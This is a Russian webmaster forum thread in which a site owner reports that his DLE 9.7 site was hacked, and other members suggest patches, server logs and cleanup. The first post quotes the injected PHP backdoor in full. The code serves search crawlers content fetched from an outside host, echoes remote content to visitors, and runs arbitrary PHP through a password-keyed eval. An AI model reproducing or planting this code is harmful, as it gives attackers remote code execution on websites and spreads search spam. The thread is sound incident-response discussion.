X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Взломали сайт dle 9.7
vasyatko
vasyatko
Topic Starter сообщение 20.11.2012, 19:38; Ответить: vasyatko
Сообщение #1


Взломали сайт dle 9.7
На главной странице
Fatal error: Call to undefined function gzinflate() in /home/admin/data/www/vkonatke.in/get.php(3) : eval()'d code on line 1

В index.php


<?php
//###==###
error_reporting(0);

$host = "http://vkonatke.in/get.php";

$ident = "qwerty";



        $bot = urlencode($_SERVER['HTTP_USER_AGENT']);

    if (preg_match("/(yandex|google)/i", $_SERVER['HTTP_USER_AGENT'])) {

        $id = urlencode("http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);

        $url = $host."?id=".$id."&charset=w&bot=".$bot;

            if(ini_get("allow_url_fopen") == 1) {

                echo file_get_contents($url);

            }elseif(function_exists('curl_init')) {

                $ch = curl_init($url);

                curl_setopt($ch, CURLOPT_HEADER, FALSE);

                curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);

                $result = curl_exec($ch);

                curl_close($ch);

            echo $result;

        }

    }

        $url = $host."?code=code&bot=".$bot;

            if(ini_get("allow_url_fopen") == 1) {

                echo file_get_contents($url);

            }elseif(function_exists('curl_init')) {

                $ch = curl_init($url);

                curl_setopt($ch, CURLOPT_HEADER, FALSE);

                curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);

                $result = curl_exec($ch);

                curl_close($ch);

            echo $result;

        }

        if($_REQUEST["c"] == $ident) eval(stripslashes($_REQUEST["code"]));


//###==###
?>


--------------------
2
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fioru
fioru
сообщение 20.11.2012, 20:18; Ответить: fioru
Сообщение #2


Раз пишите тут а не на официальном, видимо пользуетесь null'ом, а там шеллов хватает, чему тогда удивляться что вас взломали?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
OldSpice
OldSpice
сообщение 20.11.2012, 20:30; Ответить: OldSpice
Сообщение #3


http://dle-news.ru/bags/v97/1538-patchi-be...97-i-nizhe.html


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
tsa
tsa
сообщение 20.11.2012, 20:51; Ответить: tsa
Сообщение #4


Покупайте лицензию и не каких проблем не будет =) а нулл это дело такое... тож когда то стял нул взломали перешол на лицуху и не каких проблем больше небыло happy.gif


--------------------


Поблагодарили: (0)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
vasyatko
vasyatko
Topic Starter сообщение 20.11.2012, 22:39; Ответить: vasyatko
Сообщение #5


fioru и tsa просто ненадо нулл откуда попало качать. Здесь дело не в нулл версии.


OldSpice
Степень опасности: Высокая при использовании включенной настройки register_globals

Эта функция была отключена. Был только включен magic_quotes_gpc


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fioru
fioru
сообщение 20.11.2012, 22:41; Ответить: fioru
Сообщение #6


vasyatko, я их вообще не качаю)
А вот вы видимо качаете где поподя, хотя не исключено что у Вас вообще дыры на стороне серверного ПО
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rampage
Rampage
сообщение 20.11.2012, 23:31; Ответить: Rampage
Сообщение #7


а логи сервера есть?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 20.11.2012, 23:39; Ответить: kagtus
Сообщение #8


помочь очистить???


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
GET_ini
GET_ini
сообщение 21.11.2012, 18:45; Ответить: GET_ini
Сообщение #9


Rampage верно подмечено!

ТС покажи логи! Через какой именно файл Вас Геттили и инклудили smile.gif
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
AleZ
AleZ
сообщение 21.11.2012, 19:01; Ответить: AleZ
Сообщение #10


Зря сразу про нуллы писать начали, да и версия 9.7 весьма устойчивая к взломам (но и тут без патча не обошлось sad.gif ). В последнее время зачастую ломают через различные модули каталогов, переходов и так далее. Если движок интенсивно обновляется, то авторы модулей не спешат. Еще, не стоит снимать со счета права на запись в разные директории,шаблоны с сомнительных сайтов, проблемы хостера, отсутствие антивруса, криворукость и угнанные пароли. В первую очередь стоит снять логи с сервера и посмотреть, откуда лезли и какие файлы затронули еще.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Будет ли склейка сайтов если старый телефон перенести на новый сайт?
1 noviktamw 391 Вчера, 18:31
автор: malamut
Горячая тема (нет новых ответов) Ваш сайт блокирует Роскомнадзор?
29 hollywooduk 6021 Вчера, 11:21
автор: hollywooduk
Открытая тема (нет новых ответов) Прототипирование + дизайн + вёрстка = красивый и эффективный сайт под ключ
0 bunneh 462 16.4.2024, 18:02
автор: bunneh
Открытая тема (нет новых ответов) Если в сайт с одними ключами, которые там долго, добавить новую рубрику с новыми ключами
2 Tutich 1333 16.4.2024, 8:27
автор: Tutich
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлы[Услуги] Баннер/Графика/Сайт
240 FillPlay 180639 31.3.2024, 22:58
автор: FillPlay


 



RSS Текстовая версия Сейчас: 25.4.2024, 14:05
Дизайн